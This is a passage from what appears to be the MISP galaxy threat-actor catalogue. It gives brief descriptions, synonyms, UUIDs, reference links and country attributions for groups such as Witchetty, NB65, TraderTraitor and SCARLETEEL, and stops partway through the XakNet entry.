Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Witchetty.
Known Synonyms |
---|
LookingFrog |
Internal MISP references
UUID 202f5481-7bae-4a0b-b117-0642ea1dbe65
which can be used as unique global reference for Witchetty
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-witchetty-apt-group-active-iocs - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage - webarchive
- https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
NB65
Network Battalion 65 is a hacktivist group with ties to Anonymous, known for attacking Russian companies and performing hack-and-leak operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NB65.
Known Synonyms |
---|
Network Battalion 65 |
Internal MISP references
UUID e1941666-dcde-4f31-8a56-8041ac82bb99
which can be used as unique global reference for NB65
in MISP communities and other software using the MISP galaxy
External references
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-leaked-conti-ransomware-used-to-target-russia-active-iocs - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html - webarchive
- https://securelist.com/reassessing-cyberwarfare-lessons-learned-in-2022/108328/ - webarchive
- https://www.rewterz.com/articles/russian-ukrainian-cyber-warfare-rewterz-threat-intelligence-rollup - webarchive
- https://www.hackread.com/anonymous-affiliate-nb65-russia-broadcaster-data-breach/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
IndigoZebra
IndigoZebra is a Chinese state-sponsored actor mentioned for the first time by Kaspersky in its APT Trends report Q2 2017, targeting, at the time of its discovery, former Soviet Republics with multiple malware strains including Meterpreter, Poison Ivy, xDown, and a previously unknown backdoor called “xCaon.”
Internal MISP references
UUID 79e826b0-b051-4a61-b38c-496021b3afdb
which can be used as unique global reference for IndigoZebra
in MISP communities and other software using the MISP galaxy
External references
- https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-intel-indigozebra-apt-group-targeting-central-asia-active-iocs - webarchive
- https://securelist.com/apt-trends-report-q2-2017/79332/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
GhostSec
GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostSec.
Known Synonyms |
---|
Ghost Security |
Internal MISP references
UUID a1315451-326f-4185-8d71-80f9243f395f
which can be used as unique global reference for GhostSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OilAlpha
OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.
Internal MISP references
UUID ae2b897d-f285-4d03-9bab-0ff59d6657a7
which can be used as unique global reference for OilAlpha
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
HiddenArt
It was observed that a mobile network threat actor designated as ‘HiddenArt’ actively sustains a capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since detecting this threat actor, periodic reconnaissance activities were observed in at least 7 target mobile networks around the world and given the wide geographic distribution of these targeted mobile operators, it is probable that the threat actor is active on a global scale.
Internal MISP references
UUID cdcfd3e1-4e42-4746-b1f1-66d5ce27b4da
which can be used as unique global reference for HiddenArt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
REF5961
Elastic's security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group's tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961's arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.
Internal MISP references
UUID 64234b2e-0c78-466d-8253-0df339f99f5f
which can be used as unique global reference for REF5961
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
REF2924
A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia. According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.
Internal MISP references
UUID c46ed7e9-3949-4c57-ab14-177d88f27e2c
which can be used as unique global reference for REF2924
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Storm-1133
In early 2023, Microsoft observed a wave of activity from a Gaza-based group that it tracks as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.
Internal MISP references
UUID d5908276-068a-4a4f-a60d-ab5800173ccd
which can be used as unique global reference for Storm-1133
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
TA499
TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TA499.
Known Synonyms |
---|
Lexus |
Vovan |
Internal MISP references
UUID 0e9bbcf1-9273-4438-b437-287317bfb989
which can be used as unique global reference for TA499
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BadRory
Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged booby-trapped Office emails. Targets included government entities, military contractors, universities, and hospitals.
Internal MISP references
UUID aa74d1f3-b294-405b-bb18-3ac1c13560a1
which can be used as unique global reference for BadRory
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SharpPanda
SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.
Internal MISP references
UUID 7133a722-088c-4d5a-b2e0-a1f9915f807d
which can be used as unique global reference for SharpPanda
in MISP communities and other software using the MISP galaxy
External references
- https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/ - webarchive
- https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-chinese-apt-group-targets-southeast-asian-government-active-iocs - webarchive
- https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/ - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | CN |
Guacamaya
Guacamaya has conducted multiple hack and leak campaigns against military and police agencies and mining companies across Latin America, which they believe have played a role in the region’s environmental degradation and repression of native populations.
Internal MISP references
UUID 51f056f5-b596-446e-9394-a310af4e2e75
which can be used as unique global reference for Guacamaya
in MISP communities and other software using the MISP galaxy
External references
- https://cyberscoop.com/environmentalist-hacktivist-collective-mining-company/ - webarchive
- https://srslyriskybiz.substack.com/p/recent-cyber-chaos-is-a-structural - webarchive
- https://finance.yahoo.com/news/analysis-mexico-data-hack-exposes-003101651.html - webarchive
- https://www.redpacketsecurity.com/guacamaya-hacktivists-stole-sensitive-data-from-mexico-and-latin-american-countries/ - webarchive
- https://research.checkpoint.com/2022/3rd-october-threat-intelligence-report/ - webarchive
- https://www.cyberscoop.com/central-american-hacking-group-releases-emails/ - webarchive
- https://therecord.media/mexican-army-spyware - webarchive
Associated metadata
Metadata key | Value |
---|---|
DustSquad
Prodaft researchers have published a report on Paperbug, a cyber-espionage campaign carried out by suspected Russian-speaking group Nomadic Octopus and which targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telcos, and public service infrastructures. Compromised devices also included OT devices, besides your typical computers, servers, and mobile devices. In typical Prodaft fashion, the company also gained access to one of the group's C&C server backend panels.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DustSquad.
Known Synonyms |
---|
Nomadic Octopus |
Internal MISP references
UUID 7b227f41-efea-4dc0-8a2a-148893795ce4
which can be used as unique global reference for DustSquad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
KromSec
KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec's attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.
Internal MISP references
UUID f4b81cb7-0492-414f-8bf4-cc806cbff1a9
which can be used as unique global reference for KromSec
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Cyber Av3ngers
The hacktivist group ‘Cyber Av3ngers’ has historically claimed attacks on Israel’s critical infrastructures. It has been launching DDoS attacks and claiming breaches of Israeli networks with supporting data leaks.
Internal MISP references
UUID 286db62d-859d-48e2-9601-1b7abde9f3c3
which can be used as unique global reference for Cyber Av3ngers
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/ - webarchive
- https://cyberwarzone.com/cyber-av3ngers-claims-infiltration-of-israeli-water-treatment-stations-amid-ongoing-conflict/ - webarchive
- https://cyberwarzone.com/hacking-group-cyber-av3ngers-claims-responsibility-for-yavne-power-outages-what-you-need-to-know/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
Altahrea Team
Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.
Internal MISP references
UUID b87f9ba7-f480-4ed5-b60e-b880e6b519ea
which can be used as unique global reference for Altahrea Team
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/ddos-attacks-in-q2-2022/107025/ - webarchive
- https://www.timesofisrael.com/cyberattack-on-health-ministry-website-blocks-overseas-access/ - webarchive
- https://techmonitor.ai/technology/cybersecurity/alahrea-team-power-plant-fire-israel - webarchive
- https://www.presstv.ir/Detail/2022/07/27/686324/Iraqi-hacker-group--ALtahrea-Team--targets-Israeli-IT,-e-commerce-companies-with-major-cyber-attack - webarchive
- https://www.hackread.com/pro-iran-altahrea-hit-port-of-london-website-ddos-attack/ - webarchive
- https://nsi-globalcounterintelligence.com/cyber-security/pro-iran-hackers-target-israel-airports-authority-website/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IQ |
1937CN
1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.
Internal MISP references
UUID 391573c5-9c21-4984-b6b8-97d42623d6cc
which can be used as unique global reference for 1937CN
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html - webarchive
- https://www.recordedfuture.com/international-hacktivism-analysis/ - webarchive
- http://securityaffairs.co/wordpress/49876/hacking/china-1937cn-team-vietnam.html - webarchive
- https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ShroudedSnooper
In September 2023, Cisco Talos identified a new malware family, which it calls 'HTTPSnoop', being deployed against telecommunications providers in the Middle East. Talos also discovered a sister implant to 'HTTPSnoop', which it is naming 'PipeSnoop', that can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that Talos has named 'ShroudedSnooper'.
Internal MISP references
UUID 3437c5a5-4c42-4665-99df-b17bc57a7ba6
which can be used as unique global reference for ShroudedSnooper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
ShinyHunters
ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.
Internal MISP references
UUID d4fd0a30-15d4-4dfd-bf98-beff5fe34c33
which can be used as unique global reference for ShinyHunters
in MISP communities and other software using the MISP galaxy
External references
- https://cyberwarzone.com/shinyhunters-22-year-old-member-pleads-guilty-to-cyber-extortion-causing-6-million-in-damage/ - webarchive
- https://www.bitdefender.com/blog/hotforsecurity/pizza-hut-australia-leaks-one-million-customers-details-claims-shinyhunters-hacking-group/ - webarchive
- https://www.justice.gov/usao-wdwa/pr/alleged-french-cybercriminal-appear-seattle-indictment-conspiracy-computer-intrusion - webarchive
Associated metadata
Metadata key | Value |
---|---|
IronHusky
IronHusky is a China-based threat actor first attributed in July 2017 targeting Russian and Mongolian governments, as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.
Internal MISP references
UUID 34d1e532-3d47-44cb-b87c-7e9cbba2321e
which can be used as unique global reference for IronHusky
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
UserSec
UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.
Internal MISP references
UUID d0e1811e-53f9-48b5-b2ef-107e0f53239b
which can be used as unique global reference for UserSec
in MISP communities and other software using the MISP galaxy
External references
- https://therecord.media/scandinavian-airlines-cyberattack-anonymous-sudan/ - webarchive
- https://blog.cyble.com/2023/05/24/notable-ddos-attack-tools-and-services-supporting-hacktivist-operations-in-2023/ - webarchive
- https://socradar.io/cyber-shadows-pact-darknet-parliament-killnet-anonymous-sudan-revil/ - webarchive
- https://socradar.io/dark-peep-2-war-and-a-piece-of-hilarity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UAC-0094
The State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users' Telegram accounts. The Ukrainian CERT attributes the hacking campaign to threat actors tracked as UAC-0094. The threat actors target Telegram users by sending Telegram messages with malicious links to the Telegram website in order to gain unauthorized access to the accounts and obtain the one-time code sent by SMS.
Internal MISP references
UUID def3c4e4-9d59-478f-8895-d3850cfa99c3
which can be used as unique global reference for UAC-0094
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
TraderTraitor
TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TraderTraitor.
Known Synonyms |
---|
Jade Sleet |
Pukchong |
UNC4899 |
Internal MISP references
UUID 825abfd9-7238-4438-a9e7-c08791f4df4e
which can be used as unique global reference for TraderTraitor
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/north-korea-supply-chain - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa22-108a - webarchive
- https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023 - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | KP |
TheDarkOverlord
The Dark Overlord is a financially motivated ransomware group that has been active since 2016. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.
Internal MISP references
UUID 167bd5f9-fa61-4a4e-91bc-3ca0d17294b2
which can be used as unique global reference for TheDarkOverlord
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/peachtree-orthopedics-alerts-patients-of-cyberattack-third-patient-data-breach-in-seven-years/ - webarchive
- http://securityaffairs.co/wordpress/64782/data-breach/london-bridge-plastic-surgery-hack.html - webarchive
- http://www.csoonline.com/article/3193397/security/no-netflix-is-not-a-victim-of-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
UNC2565
UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565's motivations are currently unknown, but its activity overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UNC2565.
Known Synonyms |
---|
Hive0127 |
Internal MISP references
UUID d7d270d2-b91f-4978-a9e9-76fa7f0d8f06
which can be used as unique global reference for UNC2565
in MISP communities and other software using the MISP galaxy
External references
- https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations - webarchive
- https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/ - webarchive
- https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Desorden Group
Desorden (Spanish for "disorder"; previously known as ChaosCC) is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021, on RaidForums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands, and offer databases for sale. The group gained an excellent reputation among cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.
Internal MISP references
UUID e89ebfcb-e7a3-4b2d-b0d7-399bb4904e27
which can be used as unique global reference for Desorden Group
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/major-malaysian-water-utilities-company-hit-by-hackers-ranhill-offline-hackers-claim-databases-and-backups-deleted/ - webarchive
- https://www.databreaches.net/one-month-later-ranhill-still-hasnt-fully-recovered-from-cyberattack/ - webarchive
- https://www.databreaches.net/malaysian-online-stock-brokerage-firm-victim-of-cyberattack/ - webarchive
- https://www.databreaches.net/johnson-fitness-and-wellness-hit-by-desorden-group/ - webarchive
- https://www.databreaches.net/thailands-the-icon-group-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/customer-data-from-hundreds-of-indonesian-and-malaysian-restaurants-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/major-indonesia-tollroad-operator-hacked-by-desorden/ - webarchive
- https://www.databreaches.net/recent-cyberattacks-put-thai-citizens-privacy-and-data-security-at-greater-risk/ - webarchive
- https://www.databreaches.net/thai-entities-continue-to-fall-prey-to-cyberattacks-and-leaks/ - webarchive
- https://seclists.org/dataloss/2021/q4/81 - webarchive
Associated metadata
Metadata key | Value |
---|---|
Confucious
Confucius is an APT organization funded by India. It has been carrying out cyber attacks since 2013. Its main targets are India's neighbouring countries such as Pakistan and China. It has a strong interest in targets in the fields of military, government and energy.
Internal MISP references
UUID 54618130-55d3-4506-b62b-67f2dca12b04
which can be used as unique global reference for Confucious
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IN |
Kiss-a-Dog
CrowdStrike identified a cryptojacking campaign targeting vulnerable Docker and Kubernetes infrastructure. Called "Kiss-a-dog", the campaign targets Docker and Kubernetes infrastructure using an obscure domain in the payload, container escape attempts, and anonymized "dog" mining pools.
Internal MISP references
UUID 1db6375f-0471-47c5-8128-5ab1519b01ab
which can be used as unique global reference for Kiss-a-Dog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DEV-1028
Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.
Internal MISP references
UUID 6616d2ac-2025-47f8-bb1a-1ece2b627c16
which can be used as unique global reference for DEV-1028
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TwoSail Junk
TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TwoSail Junk.
Known Synonyms |
---|
Operation Poisoned News |
Internal MISP references
UUID 533af03d-e160-4312-a92f-0500055f2b56
which can be used as unique global reference for TwoSail Junk
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/ - webarchive
- https://securelist.com/apt-annual-review-what-the-worlds-threat-actors-got-up-to-in-2020/99574/ - webarchive
- https://www.redpacketsecurity.com/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/?utm_source=rss&utm_medium=rss&utm_campaign=operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links - webarchive
Associated metadata
Metadata key | Value |
---|---|
Xcatze
Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses a Python-based malware named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.
Internal MISP references
UUID 83764206-8012-47c6-9c7a-dc04c99559e7
which can be used as unique global reference for Xcatze
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BlueBottle
Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.
Internal MISP references
UUID 87f1ab70-a102-4566-a09e-838b39c18a62
which can be used as unique global reference for BlueBottle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Dalbit
The group usually targets vulnerable servers to breach information including internal data from companies or encrypts files and demands money. Their targets of attack are usually Windows servers that are poorly managed or are not patched to the latest version. Besides these, there are also attack cases that targeted email servers or MS-SQL database servers.
Internal MISP references
UUID be4ea668-6a74-44d9-946e-e98e64a8855b
which can be used as unique global reference for Dalbit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SingularityMD
SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.
Internal MISP references
UUID d52a06dd-3ee9-47cf-ad31-b55ca4cbc5cf
which can be used as unique global reference for SingularityMD
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/jeffco-public-schools-hit-by-the-same-threat-actors-that-hit-clark-county-school-district-and-via-the-same-way/ - webarchive
- https://research.checkpoint.com/2023/30th-october-threat-intelligence-report/ - webarchive
- https://www.databreaches.net/hackers-escalate-leak-200k-ccsd-students-data-claim-to-still-have-access-to-ccsd-email-system/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
SCARLETEEL
SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.
Internal MISP references
UUID e03a7ecb-b8a1-40c5-b5af-638ee6029374
which can be used as unique global reference for SCARLETEEL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
DiceyF
DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.
Internal MISP references
UUID 46de4091-379f-478c-bb6d-5833e2047f15
which can be used as unique global reference for DiceyF
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
DEV-0950
Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DEV-0950.
Known Synonyms |
---|
Lace Tempest |
Internal MISP references
UUID 4581f930-348e-4054-a71c-863871de66ee
which can be used as unique global reference for DEV-0950
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
WeRedEvils
WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran's oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.
Internal MISP references
UUID 7ba756f0-0753-4da9-b00d-8cf35ba84e57
which can be used as unique global reference for WeRedEvils
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IL |
WIRTE
WIRTE is a threat actor group that was first discovered in 2018. They are suspected to be part of the Gaza Cybergang, an Arabic politically motivated cyber criminal group. WIRTE has been observed changing their toolkit and operating methods to remain undetected for longer periods of time. They primarily target governmental and political entities, but have also been known to target law firms and financial institutions.
Internal MISP references
UUID ec6bcaa9-4cb3-4397-a735-c806bc986c81
which can be used as unique global reference for WIRTE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | PS |
Caracal Kitten
Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Caracal Kitten.
Known Synonyms |
---|
APT-Q-58 |
Internal MISP references
UUID 46a67fdf-5376-4d01-8092-6549a20030af
which can be used as unique global reference for Caracal Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Water Labbu
Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victims' wallets, unlike other similar campaigns, they did not use any kind of social engineering, at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.
Internal MISP references
UUID 7f24740c-9370-4968-a92e-667ef2591abe
which can be used as unique global reference for Water Labbu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TAG-56
TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.
Internal MISP references
UUID 7cae7378-5595-4d1e-be63-e13216162a20
which can be used as unique global reference for TAG-56
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | IR |
TA482
Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.
Internal MISP references
UUID 610a7301-5963-4653-8aa2-eeb8573dfad9
which can be used as unique global reference for TA482
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | TR |
XakNet
XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be composed of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XakNet.
Known Synonyms |
---|
UAC-0100 |
UAC-0106 |
Internal MISP references
UUID 566752f5-a294-4430-b47e-8e705f9887ea
which can be used as unique global reference for XakNet
